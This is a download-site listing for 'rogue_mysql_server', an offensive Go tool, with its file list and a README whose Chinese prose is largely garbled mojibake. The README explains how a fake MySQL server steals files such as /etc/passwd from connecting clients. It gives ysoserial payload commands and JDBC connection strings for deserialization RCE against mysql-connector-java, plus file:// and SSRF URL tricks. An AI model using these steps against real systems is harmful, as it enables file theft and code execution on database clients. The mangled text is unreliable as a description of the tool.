rogue_mysql_server
所属分类:MySQL数据库
开发工具:GO
文件大小:181KB
下载次数:0
上传日期:2022-12-02 06:32:26
上 传 者:
sh-1993
说明: rouge-mysql服务器支持从多种编程语言的大多数mysql库中读取文件。
(A rouge mysql server supports reading files from most mysql libraries of multiple programming languages.)
文件列表:
LICENSE.txt (1062, 2022-12-02)
Makefile (122, 2022-12-02)
config.yaml (503, 2022-12-02)
go.mod (562, 2022-12-02)
go.sum (10245, 2022-12-02)
loot (0, 2022-12-02)
main.go (10490, 2022-12-02)
mysql (0, 2022-12-02)
mysql\auth_server.go (7922, 2022-12-02)
mysql\auth_server_none.go (1948, 2022-12-02)
mysql\auth_server_static.go (10744, 2022-12-02)
mysql\auth_server_static_test.go (9746, 2022-12-02)
mysql\binlog_event.go (10075, 2022-12-02)
mysql\binlog_event_common.go (11318, 2022-12-02)
mysql\binlog_event_common_test.go (12493, 2022-12-02)
mysql\binlog_event_json.go (16107, 2022-12-02)
mysql\binlog_event_json_test.go (6161, 2022-12-02)
mysql\binlog_event_make.go (14126, 2022-12-02)
mysql\binlog_event_make_test.go (11670, 2022-12-02)
mysql\binlog_event_mariadb.go (2606, 2022-12-02)
mysql\binlog_event_mariadb_test.go (12965, 2022-12-02)
mysql\binlog_event_mysql56.go (2917, 2022-12-02)
mysql\binlog_event_mysql56_test.go (5644, 2022-12-02)
mysql\binlog_event_rbr.go (39522, 2022-12-02)
mysql\binlog_event_rbr_test.go (20012, 2022-12-02)
mysql\binlog_event_test.go (1824, 2022-12-02)
mysql\charset.go (3195, 2022-12-02)
mysql\client.go (23620, 2022-12-02)
mysql\client_test.go (4442, 2022-12-02)
mysql\conn.go (37933, 2022-12-02)
mysql\conn_params.go (1986, 2022-12-02)
mysql\conn_test.go (9785, 2022-12-02)
... ...
# Rogue Mysql Server
[English README](https://github.com/rmb122/rogue_mysql_server/blob/master/./README_EN.md)
https://github.com/vitessio/vitess ° mysql ¨, ””¨ go, php, python, java, ”‘¤è‰¤§èè¨è§ mysql “è––.
è…§é—é, èè·è§è¨
| language | library | pass |
|----------|--------------------------------|------|
| go | github.com/go-sql-driver/mysql | ” |
| php | mysqli, pdo | ” |
| python | pymysql | ” |
| java | mysql-connector-java | ” |
| native | 10.4.13-MariaDB | ” |
觉—”¨– ”è…
## è
* …¤§ mysql ·
* è–è–
* 訖
* 蔨—, 鉷éè
* 薷 ConnAttr, 腷餖
* mysql-connector-java, ¨§é“…”¨—–èè RCE
## Ӭ
¨“‰”é…–¨‰, ·‰é…–è·èè
```sh
./rogue_mysql_server -generate
```
èè¨, ”¨” config.yaml
```sh
./rogue_mysql_server
```
–è…‰¨é…è·
```sh
./rogue_mysql_server -config other_config.yaml
```
## é…–
¤:
```yaml
host: 0.0.0.0
port: 3306
# ‘ IP ’.
version_string: "10.4.13-MariaDB-log"
# ·—°‰.
file_list: ["/etc/passwd", "C:/boot.ini"]
save_path: ./loot
# éèè––, ¨è‘§è–—訉‰– (¤·°”觓).
# è·‰§èè, ‰…§—è¨éè––, ° `save_path` –¤.
always_read: true
# true, é·è°è·±” LOAD DATA LOCAL, é°èè––, ·è°è–, é…·è·±.
from_database_name: false
# true, °·è°“§°–èè––.
# é“ `jdbc:mysql://localhost:3306/%2fetc%2fhosts?allowLoadLocalInfile=true`.
# °·è– `/etc/hosts` èé `file_list` è.
max_file_size: 0
# è––¤§¤§° ( byte), è…è褧°–…°è. <= 0, 訉é.
auth: false
users:
- root: root
- root: password
# ”éè, `false`, éè“–è…è“…é.
# `true`, éè·é…éè·.
jdbc_exploit: false
always_exploit: false
ysoserial_command:
cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']
# è§ `jdbc ”¨…` è
```
## mysql-connector-java —–”¨…
¨‰ >= 8.0.20, >= 5.1.49 , ¤·è¤,
https://github.com/mysql/mysql-connector-j/commit/de7e1af306ffbb8118125a8659***f***ee5b35b1b
https://github.com/mysql/mysql-connector-j/commit/13f06c38fb68757607c460789196e3f7***d506f2
mysql-connector-java —–”¨…é…
```yaml
jdbc_exploit: false
always_exploit: false
ysoserial_command:
cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']
```
`jdbc_exploit` è¨èè, ¨°· mysql-connector-j …訔¨. ”¨’è––è—é, ”¨è—è–·–.
`always_exploit` 訷 mysql-connector-java, ”¨.
`ysoserial_command` ”—– payload ‘¤.
”¨è `connectionAttributes` é‰éé蔨 payload, èé‰é豧. ¨è–豧 `t` ‰” payload. , é褔¨‰‰ payload .
, ”¨è°¤é…:
¨ 8.x ‰è”¨ cc7, è `jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:cc7&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password`
¤–é訔 `com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor` ”¨–, èè¨:
| version | jdbc connection string |
|----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 8.x | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password |
| 6.x | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password |
| >=5.1.11 | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password |
¤–éèè–, mysql-connector-java ””¨ `file://` — (“…–è, http SSRF ), éè¨ `allowLoadLocalInfile` true ¤–, 餖 `allowUrlInLocalInfile` true, è…è§[èé](https://github.com/rmb122/rogue_mysql_server/blob/master/https://github.com/mysql/mysql-connector-j/blob/dd61577595edad45c3***af508cf91ad26fc4144f/src/main/protocol-impl/java/com/mysql/cj/protocol/a/NativeProtocol.java#L1877)
E.g.
* — `/` , `jdbc:mysql://127.0.0.1:3306/file%3A%2F%2F%2F?allowLoadLocalInfile=true&allowUrlInLocalInfile=true`
* SSRF `http://127.0.0.1:25565`, `jdbc:mysql://127.0.0.1:3306/http%3A%2F%2F127.0.0.1:25565?allowLoadLocalInfile=true&allowUrlInLocalInfile=true`
## Ref
mysql-connector-java Ӭ:
https://github.com/fnmsd/MySQL_Fake_Server
mysql è…:
https://github.com/mysql/mysql-connector-j
https://github.com/vitessio/vitess
https://github.com/src-d/go-mysql-server
http://scz.617.cn:8/network/202001101612.txt
近期下载者:
相关文件:
收藏者: